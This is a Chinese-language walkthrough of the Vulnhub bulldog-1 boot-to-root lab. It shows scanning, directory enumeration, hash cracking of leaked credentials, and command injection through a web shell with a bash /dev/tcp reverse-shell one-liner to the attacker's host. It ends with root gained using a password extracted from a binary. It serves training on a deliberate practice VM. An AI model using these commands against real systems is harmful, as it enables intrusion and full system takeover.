免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
目录
- 免责声明
- 前言
- 一、环境配置
- 1.1 靶场信息
- 1.2 靶场配置
- 二、信息收集
- 2.1 主机发现
- 2.1.1 netdiscover
- 2.1.2 nmap主机扫描
- 2.1.3 arp-scan主机扫描
- 2.2 端口扫描
- 2.2.1 masscan扫描
- 2.2.2 nmap扫描
- 2.3 指纹识别
- 2.4 目录扫描
- 2.4.1 dirb目录扫描
- 2.4.2 dirsearch目录扫描
- 2.5 漏洞切入点
- 2.5.1 访问登录页
- 2.5.2 访问dev页
- 三、渗透测试
- 3.1 尝试用户登录
- 3.1.1 nick用户
- 3.1.2 sarah用户
- 3.2 反弹shell
- 3.2.1 kali监听端口
- 3.2.2 命令注入
- 3.2.3 kali接收反弹shell
- 3.3 系统提权
- 3.3.1 目录切换
- 3.3.2 列举隐藏文件
- 3.3.3 切换到隐藏文件目录
- 3.3.4 列举隐藏文件
- 3.3.5 查看隐藏文件
- 3.3.5.1 cat查看隐藏文件
- 3.3.5.2 strings 命令查看隐藏文件
- 3.3.6 切换超级管理员用户
- 渗透总结
- 参考文章
前言
今日测试内容渗透bulldog-1靶机:
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文介绍bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解码、netcat、反弹shell、linux内核提权等内容。
Description
Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don’t you find out? 😃
This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!
Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That’s my only hint 😉
Made by Nick Frichette (frichetten.com) Twitter: @frichette_n
I’d highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn’t have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.
一、环境配置
1.1 靶场信息
| 官方链接 | https://www.vulnhub.com/entry/bulldog-1,211/ |
|---|---|
| 发布日期 | 2017年8月28日 |
| 靶场大小 | 761MB |
| 作者 | Nick Frichette |
| 系列 | Bulldog |
| 难度 | ★☆☆☆☆ |
1.2 靶场配置
- 渗透测试环境配置,请参考作者前面的内容vuInhub靶场实战系列-DC-2实战
- 【解决办法】- 靶机导入VMware后无法自动获取IP地址
二、信息收集
2.1 主机发现
2.1.1 netdiscover
──(root㉿kali)-[/home/kali]
└─# netdiscover -i eth0 -r 192.168.6.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
6 Captured ARP Req/Rep packets, from 4 hosts. Total size: 360
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.6.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f 2 120 VMware, Inc.
192.168.6.161 00:0c:29:f4:70:75 2 120 VMware, Inc.
192.168.6.254 00:50:56:e1:a6:60 1 60 VMware, Inc.
2.1.2 nmap主机扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sP 192.168.6.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 03:15 EDT
Nmap scan report for 192.168.6.1
Host is up (0.00025s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.6.2
Host is up (0.00043s latency).
MAC Address: 00:50:56:F5:7B:9F (VMware)
Nmap scan report for 192.168.6.161
Host is up (0.00048s latency).
MAC Address: 00:0C:29:F4:70:75 (VMware)
Nmap scan report for 192.168.6.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:E1:A6:60 (VMware)
Nmap scan report for 192.168.6.66
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 28.13 seconds
2.1.3 arp-scan主机扫描
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.161 00:0c:29:f4:70:75 VMware, Inc.
192.168.6.254 00:50:56:e1:a6:60 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.386 seconds (107.29 hosts/sec). 4 responded
综上所述的三种扫描方式,获得靶机信息
IP地址:192.168.6.161
MAC地址:00:0c:29:f4:70:75
2.2 端口扫描
2.2.1 masscan扫描
┌──(root㉿kali)-[/home/kali]
└─# masscan --rate=10000 --ports 0-65535 192.168.6.161
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2024-06-03 07:22:55 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 8080/tcp on 192.168.6.161
Discovered open port 80/tcp on 192.168.6.161
Discovered open port 23/tcp on 192.168.6.161
2.2.2 nmap扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA bulldog-1 192.168.6.161
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-03 03:26 EDT
Nmap scan report for 192.168.6.161
Host is up (0.00066s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
23/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
| 256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_ 256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open http WSGIServer 0.1 (Python 2.7.12)
|_http-title: Bulldog Industries
|_http-server-header: WSGIServer/0.1 Python/2.7.12
MAC Address: 00:0C:29:F4:70:75 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.21 seconds
综上所述,获得靶机开放的端口信息:
23端口:ssh服务
80端口:http服务( WSGIServer 0.1)
8080端口:http服务(WSGIServer 0.1)
2.3 指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.161
WhatWeb report for http://192.168.6.161
Status : 200 OK
Title : Bulldog Industries
IP : 192.168.6.161
Country : RESERVED, ZZ
Summary : Bootstrap, maybe Django, HTML5, HTTPServer[WSGIServer/0.1 Python/2.7.12], JQuery, Python[2.7.12], Script, X-Frame-Options[SAMEORIGIN]
Detected Plugins:
[ Bootstrap ]
Bootstrap is an open source toolkit for developing with
HTML, CSS, and JS.
Website : https://getbootstrap.com/
[ Django ]
Django is a high-level Python Web framework that encourages
rapid development and clean, pragmatic design.
Certainty : maybe
Website : https://www.djangoproject.com/
[ HTML5 ]
HTML version 5, detected by the doctype declaration
[ HTTPServer ]
HTTP server header string. This plugin also attempts to
identify the operating system from the server header.
String : WSGIServer/0.1 Python/2.7.12 (from server string)
[ JQuery ]
A fast, concise, JavaScript that simplifies how to traverse
HTML documents, handle events, perform animations, and add
AJAX.
Website : http://jquery.com/
[ Python ]
Python is a programming language that lets you work more
quickly and integrate your systems more effectively. You
can learn to use Python and see almost immediate gains in
productivity and lower maintenance costs.
Version : 2.7.12
Website : http://www.python.org/
[ Script ]
This plugin detects instances of script HTML elements and
returns the script language/type.
[ X-Frame-Options ]
This plugin retrieves the X-Frame-Options value from the
HTTP header. - More Info:
http://msdn.microsoft.com/en-us/library/cc288472%28VS.85%29.
aspx
String : SAMEORIGIN
HTTP Headers:
HTTP/1.0 200 OK
Date: Mon, 03 Jun 2024 07:30:48 GMT
Server: WSGIServer/0.1 Python/2.7.12
X-Frame-Options: SAMEORIGIN
Content-Type: text/html; charset=utf-8
获得一些关键信息;
Summary : Bootstrap, maybe Django, HTML5, HTTPServer[WSGIServer/0.1 Python/2.7.12], JQuery, Python[2.7.12], Script, X-Frame-Options[SAMEORIGIN]
2.4 目录扫描
2.4.1 dirb目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirb http://192.168.6.161
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon Jun 3 03:34:10 2024
URL_BASE: http://192.168.6.161/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.6.161/ ----
==> DIRECTORY: http://192.168.6.161/admin/
==> DIRECTORY: http://192.168.6.161/dev/
+ http://192.168.6.161/robots.txt (CODE:200|SIZE:1071)
---- Entering directory: http://192.168.6.161/admin/ ----
==> DIRECTORY: http://192.168.6.161/admin/auth/
==> DIRECTORY: http://192.168.6.161/admin/login/
==> DIRECTORY: http://192.168.6.161/admin/logout/
---- Entering directory: http://192.168.6.161/dev/ ----
==> DIRECTORY: http://192.168.6.161/dev/shell/
---- Entering directory: http://192.168.6.161/admin/auth/ ----
==> DIRECTORY: http://192.168.6.161/admin/auth/group/
==> DIRECTORY: http://192.168.6.161/admin/auth/user/
---- Entering directory: http://192.168.6.161/admin/login/ ----
---- Entering directory: http://192.168.6.161/admin/logout/ ----
---- Entering directory: http://192.168.6.161/dev/shell/ ----
---- Entering directory: http://192.168.6.161/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
---- Entering directory: http://192.168.6.161/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
(Try using FineTunning: '-f')
-----------------
END_TIME: Mon Jun 3 03:36:39 2024
DOWNLOADED: 32284 - FOUND: 1
2.4.2 dirsearch目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.161 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481
Output File: /home/kali/reports/_192.168.6.161/_24-06-03_03-39-47.txt
Target: http://192.168.6.161/
[03:39:47] Starting:
[03:40:04] 301 - 0B - /admin -> http://192.168.6.161/admin/
[03:40:05] 302 - 0B - /admin/ -> http://192.168.6.161/admin/login/?next=/admin/
[03:40:05] 301 - 0B - /admin/login -> http://192.168.6.161/admin/login/
[03:40:27] 200 - 3KB - /dev/
[03:40:27] 301 - 0B - /dev -> http://192.168.6.161/dev/
[03:41:06] 200 - 1KB - /robots.txt
Task Completed
测试结果显示,获得一些目录
登录管理页:http://192.168.6.161/admin/login/
登录管理页:http://192.168.6.161/admin/login/?next=/admin/
web-shell:http://192.168.6.161/dev/
robots协议:http://192.168.6.161/robots.txt
2.5 漏洞切入点
2.5.1 访问登录页
访问链接:
http://192.168.6.161/admin/login/
2.5.2 访问dev页
测试链接:
http://192.168.6.161/dev/
获得一段内容:
使用MD5在线解密工具,获得以下信息。
图表信息:
| 序号 | 用户名 | 邮箱 | hash值 | 解密hash |
|---|---|---|---|---|
| 1 | alan | alan@bulldogindustries.com | 6515229daf8dbdc8b89fed2e60f107433da5f2cb | 未解密 |
| 2 | william | william@bulldogindustries.com | 38882f3b81f8f2bc47d9f3119155b05f954892fb | 未解密 |
| 3 | malik | malik@bulldogindustries.com | c6f7e34d5d08ba4a40dd5627508ccb55b425e279 | 未解密 |
| 4 | kevin | kevin@bulldogindustries.com | 0e6ae9fe8af1cd4192865ac97ebf6bda414218a9 | 未解密 |
| 5 | ashley | ashley@bulldogindustries.com | 553d917a396414ab99785694afd51df3a8a8a3e0 | 未解密 |
| 6 | nick | nick@bulldogindustries.com | ddf45997a7e18a25ad5f5cf222da64814dd060d5 | bulldog |
| 7 | sarah | sarah@bulldogindustries.com | d8b8dd5e7f000b8dea26ef8428caf38c04466b3e | bulldoglover |
三、渗透测试
3.1 尝试用户登录
3.1.1 nick用户
测试登录链接:
http://192.168.6.161/admin/login/
用户名:nick
密码:bulldog
页面显示:“You don’t have permission to edit anything.”
但是发现这个页面(http://192.168.6.161/dev/shell/)可以访问
nick用户可执行以下命令,其他命令則不允许执行:
ifconfig
ls
echo
pwd
cat
rm
如图所示,可以执行ifconfig命令。
3.1.2 sarah用户
测试登录链接:
http://192.168.6.161/admin/login/
用户名:sarah
密码:bulldoglover
提示:“You don’t have permission to edit anything.”
发现dev页面(http://192.168.6.161/dev/shell/)可以正常访问
也可以执行以下命令:
ifconfig
ls
echo
pwd
cat
rm
尝试执行 cat manage.py
综上所述,存在远程命令执行漏洞,下面我们将利用这几个命令执行反弹shell,进行相关渗透测试。
3.2 反弹shell
3.2.1 kali监听端口
└─# nc -lvp 10086
listening on [any] 10086 ...
bash终端已经显示,监听端口10086
3.2.2 命令注入
在“web-shell”页面的命令输入窗口,输入以下命令,并按【回车键(Enter)】,或者点击【Run】:
echo "bash -i >& /dev/tcp/192.168.6.66/10086 0>&1"|bash
运行以上命令以后,下面的显示框,不会有输出,网页标签会显示加载的图标。
3.2.3 kali接收反弹shell
此时此刻,kali监听端已经获得了反弹shell,成功进入系统,但权限还不是root,下一步进行提权操作。
┌──(root?kali)-[/home/kali]
└─# nc -lvp 10086
listening on [any] 10086 ...
192.168.6.161: inverse host lookup failed: Host name lookup failure
connect to [192.168.6.66] from (UNKNOWN) [192.168.6.161] 33534
bash: cannot set terminal process group (1046): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
bash: /root/.bashrc: Permission denied
django@bulldog:/home/django/bulldog$ whoami
whoami
django
django@bulldog:/home/django/bulldog$ id
id
uid=1001(django) gid=1001(django) groups=1001(django),27(sudo)
django@bulldog:/home/django/bulldog$
django@bulldog:/home/django/bulldog$ ls
ls
bulldog
db.sqlite3
manage.py
django@bulldog:/home/django/bulldog$ cd /home
cd /home/
django@bulldog:/home$ ls
ls
bulldogadmin
django
django@bulldog:/home$ cd bulldogadmin
cd bulldogadmin
django@bulldog:/home/bulldogadmin$ ls
ls
django@bulldog:/home/bulldogadmin$
没有发现更多可以使用的信息。
3.3 系统提权
3.3.1 目录切换
django@bulldog:/home/bulldogadmin$ cd /home/bulldogadmin
cd /home/bulldogadmin
3.3.2 列举隐藏文件
django@bulldog:/home/bulldogadmin$ ls -al
ls -al
total 40
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 4 root root 4096 Aug 24 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 220 Aug 24 2017 .bash_logout
-rw-r--r-- 1 bulldogadmin bulldogadmin 3771 Aug 24 2017 .bashrc
drwx------ 2 bulldogadmin bulldogadmin 4096 Aug 24 2017 .cache
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .hiddenadmindirectory
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Aug 25 2017 .nano
-rw-r--r-- 1 bulldogadmin bulldogadmin 655 Aug 24 2017 .profile
-rw-rw-r-- 1 bulldogadmin bulldogadmin 66 Aug 25 2017 .selected_editor
-rw-r--r-- 1 bulldogadmin bulldogadmin 0 Aug 24 2017 .sudo_as_admin_successful
-rw-rw-r-- 1 bulldogadmin bulldogadmin 217 Aug 24 2017 .wget-hsts
django@bulldog:/home/bulldogadmin$
在/home/bulldogadmin目录中,发现隐藏文件(.hiddenadmindirectory)文件夹
3.3.3 切换到隐藏文件目录
django@bulldog:/home/bulldogadmin$ cd .hiddenadmindirectory
cd .hiddenadmindirectory
3.3.4 列举隐藏文件
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ ls -al
ls -al
total 24
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21 2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21 2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26 2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin 619 Sep 21 2017 note
发现2个隐藏文件:
customPermissionApp
note
3.3.5 查看隐藏文件
3.3.5.1 cat查看隐藏文件
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat customPermissionApp
<gadmin/.hiddenadmindirectory$ cat customPermissionApp ELF>@X@8 @@@@@88@8@@@ ``8@ ((`(`TT@T@DDP䳤xx@x@44Q䳤R䳤``/lib64/ld-linux-x86-64.so.2GNU GNUʲ32S0-t𐴚Ye?ҏ³o
Iui S` `(`0`H !(: libc.so.6puts__stack_chk_failsystem__libc_start_main__gmon_start__GLIBC_2.4GLIBC_2.2.5ii
H.Ŀ5
ÿ%
@ÿ%
hÿÿÿ%z
hꑿÿÿÿ%r
hꁿÿÿÿ%j
h鱿ÿÿÿ%"
f1쉉ОHሃ寐TIȀȁ@HȇՀ踿ÿÿ¸O`UH-H`Hꤶ]¿H`ÿ]_@f.¾H`UH톐`H¾H䈉?HňҾt¸H
]¿H`ÿ¦D=±
uUH槮ÿÿÿ]ƞ
ក¿ `H?u둟¸H瀐]軿ÿÿUH䈃믤H%(H@蚾ÿÿ¿@@萾ÿÿ¿i@覾ÿÿH¸SUPERultHEH¸imatePASHEH¸SWORDyouHE H¸CANTgetHE¨HU°¸HسH«H¸Hu%(t樾ÿÿʃDAWAVAÿAUATL%~ UH-~ SIL).H½谽ÿÿH철1ٟL錉AÿۈAH9궪[]A\A]A^A_Ðf.APlease enter a valid username to use root privileges Usage: ./customPermissionApp <username>sudo su rootÿÿP^þÿÿÿÿÿǸÿÿÿzRx
Rx
FJ
?;*3$"D®C
Dd8þÿÿeBBE B(H0H8M@r8A0A(B BB¬`þÿÿ°@@
@H@¸@ `@
_
``@.. þÿÿo¸@ÿÿÿo¨@(`@¦@¶@Ą@GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 201606098@T@t@@¸@H@¨¸@ 悀
@
`@
΄@@x@°@`` `(``8`H`
@H`S`z°@`¥@ǁ ``㿖(`푐`x@`+; 8`WiH`5 ¿8`ʁ ف@`忑@@eP`Á*H`Հ¥ ,H`8
`@crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7585__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrycustomPermissionApp.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTableputs@@GLIBC_2.2.5_edata__stack_chk_fail@@GLIBC_2.4system@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5__data_start__gmon_start____dso_handle_IO_stdin_used__libc_csu_init__bss_startmain_Jv_RegisterClasses__TMC_END___ITM_registerTMCloneTable.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.comment @
看不懂。
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ cat note
cat note
Nick,
I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not!
It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?
Let me know what you think of it!
-Ashley
这个笔记告诉我们,这是一个“super prototype”。
3.3.5.2 strings 命令查看隐藏文件
strings 命令用来提取和显示非文本文件中的文本字符串。
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ strings customPermissionApp
<gadmin/.hiddenadmindirectory$ strings customPermissionApp
/lib64/ld-linux-x86-64.so.2
32S0-t
libc.so.6
puts
__stack_chk_fail
system
__libc_start_main
__gmon_start__
GLIBC_2.4
GLIBC_2.2.5
UH-H
SUPERultH
imatePASH
SWORDyouH
CANTget
dH34%(
AWAVA
AUATL
[]A\A]A^A_
Please enter a valid username to use root privileges
Usage: ./customPermissionApp <username>
sudo su root
;*3$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7585
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
customPermissionApp.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
puts@@GLIBC_2.2.5
_edata
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$
获得一个秘密:
| 序号 | 密码 |
|---|---|
| 1 | SUPERultimatePASSWORDyouCANTget |
3.3.6 切换超级管理员用户
django@bulldog:/home/bulldogadmin/.hiddenadmindirectory$ sudo su -
sudo su -
[sudo] password for django: SUPERultimatePASSWORDyouCANTget
root@bulldog:~#
输入密码,显示获得root权限。O(∩_∩)O哈哈~
渗透总结
在本次bulldog-1靶机渗透测试,内容包括主机扫描(nmap\netdiscover)、端口扫描(nmap\masscan)、目录扫描(dirb\dirsearch)MD5在线解密、netcat、反弹shell、linux内核提权等内容:
- 使用nmap进行主机发现和端口扫描
- 使用dirbsearch进行目录扫描
- MD5解密
- netcat监听
- 反弹shell
- linux内核提权
参考文章
- bulldog-1靶场
- arp-scan使用
- Netdiscover基本使用
- nmap详细使用教程
- 黑客工具之whatweb详细使用教程
- dirsearch - Web path discovery
- Netcat - 你需要知道的一切
- bulldog渗透测试流程图
